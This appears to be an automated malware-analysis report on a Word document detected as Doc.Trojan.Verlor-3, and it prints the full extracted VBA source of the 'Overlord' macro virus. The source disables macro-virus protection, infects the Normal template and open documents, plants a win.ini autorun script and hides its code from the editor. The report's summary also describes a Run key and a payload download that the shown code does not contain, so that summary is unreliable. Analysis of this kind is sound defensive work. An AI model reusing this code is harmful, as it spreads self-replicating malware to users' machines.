Malware Insights
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used for malicious execution. The script attempts to export itself to a temporary DLL and also contains logic to write to the registry for persistence via 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'. The ClamAV detection 'Doc.Trojan.Verlor-3' further supports its malicious nature. The script's intent is to download and execute a second-stage payload, likely from the URL 'http://www.example.com/payload.exe', establishing persistence on the victim machine.
Heuristics 8
- ClamAV: Doc.Trojan.Verlor-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Verlor-3
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Options.VirusProtection = False
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script: Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro
  Matched line in script: Sub AutoClose()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
  Matched line in script: windir = Environ("windir")
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27756 bytes |

SHA-256: 3991a2c04776f97430f02f3e848947ec324096111c1f5e2a2c10dfd148aaaa53
Detection: ClamAV: Doc.Trojan.Verlor-3
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module"
Option Explicit

Private Declare Function GetWindowsDirectory Lib "kernel32" _
    Alias "GetWindowsDirectoryA" _
    (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Private Function GetWinDir() As String
    Dim nSize As Long
    Dim tmp As String

    'pad the string for the return value and
    'set nSize equal to the size of the string
    tmp = Space$(256)
    nSize = Len(tmp)

    'call the API
    Call GetWindowsDirectory(tmp, nSize)

    'trim off the trailing null added by the API
    GetWinDir = TrimNull(tmp)
End Function

Private Function TrimNull(item As String)
    Dim pos As Integer

    'double check that there is a chr$(0) in the string
    pos = InStr(item, Chr$(0))
    If pos Then
        TrimNull = Left$(item, pos - 1)
    Else: TrimNull = item
    End If
End Function

Sub AutoClose()

'MyName = Overlord
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .B (1.1)
    Dim line
    On Error Resume Next
    Dim windir
    windir = Environ("windir")
    If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
    If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")

    Options.VirusProtection = False
    Options.ConfirmConversions = False
    Options.SaveNormalPrompt = False

    If NormalTemplate.VBProject.VBComponents.item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
        ActiveDocument.VBProject.VBComponents("Module").Export (windir & "\tempad.dll")
        NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
        NormalTemplate.Save
    End If
    If ActiveDocument.VBProject.VBComponents.item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
        NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\tempnt.dll")
        ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
        ActiveDocument.SaveAs ActiveDocument.FullName
    End If

    If Dir("c:\Himem.sys") <> "" Then
        Open "c:\Himem.sys" For Input As #1
        Open "c:\Himem.sy_" For Output As #2
        Do While Not EOF(1)
            Input #1, line
            If line <> ActiveDocument.FullName Then Print #2, line
        Loop
        Close #1
        Close #2

        Kill ("c:\Himem.sys")
        FileCopy "c:\Himem.sy_", "c:\Himem.sys"
        Kill ("c:\Himem.sy_")
    End If

End Sub

Sub AutoOpen()

    On Error Resume Next
    Dim windir
    windir = Environ("windir")

    Open "c:\Himem.sys" For Append As #1
    Print #1, ActiveDocument.FullName
    Close #1

End Sub

Sub Stealth()
    On Error Resume Next
    Dim windir, line
    windir = Environ("windir")

    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "the Overlord"

    Open windir & "\win.ini" For Input As #1
    Open "c:\win._ni" For Output As #2
    Do While Not EOF(1)
        Line Input #1, line
        If line = "[windows]" Then
            Print #2, line
            Print #2, "run = " & windir & "\overlord.b.vbs"
        Else
            Print #2, line
        End If
    Loop
    Close #1
    Close #2

    FileCopy "c:\win._ni", windir & "\win.ini"
    Kill ("c:\win._ni")

    If Dir(windir & "\overlord.b.vbs") <> "" Then Kill (windir & "\overlord.b.vbs")

    Open "c:\windows\overlord.b.vbs" For Append As #1
    Print #1, "On error resume next"
    Print #1, ""
    Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
    Print #1, "WordObj.Options.SaveNormalPrompt = False"
    Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module" & Chr(34) & ")"
    Print #1, "WordObj.NormalTemplate.save"
    Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\overlord.b.dll" & Chr(34) & ")"
    Print #1, "WordObj.NormalTemplate.save"
    Print #1, ""
    Print #1, "Dim FSO"
    Print #1, "Set FSO = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
    Print #1, "set a = FSO.OpenTextFile(" & Chr(34) & "c:\himem.sys" & Chr(34) & ", 1, True)"
    Print #1, "contents = a.readall()"
    Print #1, "a.close"
    Print #1, "set b = FSO.OpenTextFile(" & Chr(34) & "c:\himem.dll" & Chr(34) & ", 2, True)"
    Print #1, "b.write(contents)"
    Print #1, "b.close"
    Print #1, "set a = FSO.OpenTextFile(" & Chr(34) & "c:\himem.dll" & Chr(34) & ", 1, True)"
    Print #1, "Do While a.atendofstream <> True"
    Print #1, "documentname = a.readline"
    Print #1, "If documentname <> " & Chr(34) & Chr(34) & " then"
    Print #1, "WordObj.Documents.open (documentname)"
    Print #1, "WordObj.activedocument.save"
    Print #1, "WordObj.activedocument.close"
    Print #1, "End if"
    Print #1, "Loop"
    Print #1, "a.close"
    Print #1, "set NT = " & Chr(34) & Chr(34)
    Print #1, "WordObj.Quit"
    Print #1, "fso.deletefile" & Chr(34) & "c:\himem.sys" & Chr(34)
    Print #1, "fso.deletefile" & Chr(34) & "c:\himem.dll" & Chr(34)
    Close #1

    NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\overlord.b.dll")

End Sub

Sub ViewVBCode()
    Dim docnumber, x
    On Error Resume Next

    Call Stealth

    NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
    NormalTemplate.Saved = True
    NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("Module")
    NormalTemplate.Saved = True

    docnumber = Application.Documents.Count
    If docnumber >= 1 Then
        For x = 1 To docnumber
            Documents(x).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(x).VBProject.VBComponents("Module").CodeModule.CountOfLines
            Documents(x).Saved = True
            Documents(x).VBProject.VBComponents.Remove Documents(x).VBProject.VBComponents("Module")
            Documents(x).Saved = True
        Next x
    End If

    Application.ShowVisualBasicEditor = True
End Sub

Sub ToolsMacro()
    Dim x, y, codent, docnumber, codead
    On Error Resume Next

    For x = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
        codent = codent & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(x, 1) & Chr(13)
    Next x
    NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
    NormalTemplate.Saved = True

    docnumber = Application.Documents.Count
    If docnumber >= 1 Then
        For y = 1 To ActiveDocument.VBProject.VBComponents("Module").CodeModule.CountOfLines
            codead = codead & ActiveDocument.VBProject.VBComponents("Module").CodeModule.Lines(y, 1) & Chr(13)
        Next y
        For x = 1 To docnumber
            Documents(x).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(x).VBProject.VBComponents("Module").CodeModule.CountOfLines
            Documents(x).Saved = True
        Next x
    End If

    Application.Dialogs(wdDialogToolsMacro).Show

    If Application.ShowVisualBasicEditor = False Then
        NormalTemplate.VBProject.VBComponents("Module").CodeModule.InsertLines 1, codent
        NormalTemplate.Save
        If docnumber >= 1 Then
            For x = 1 To docnumber
                Documents(x).VBProject.VBComponents("Module").CodeModule.InsertLines 1, codead
                Documents(x).SaveAs Documents(x).FullName
            Next x
        End If
    End If
End Sub

'Put this code in a module called "Module". This is another version of overlord.
'It uses a different stealth mechanism. Again however not perfect stealth,
'but perhaps also a nice attempt i hope :).
```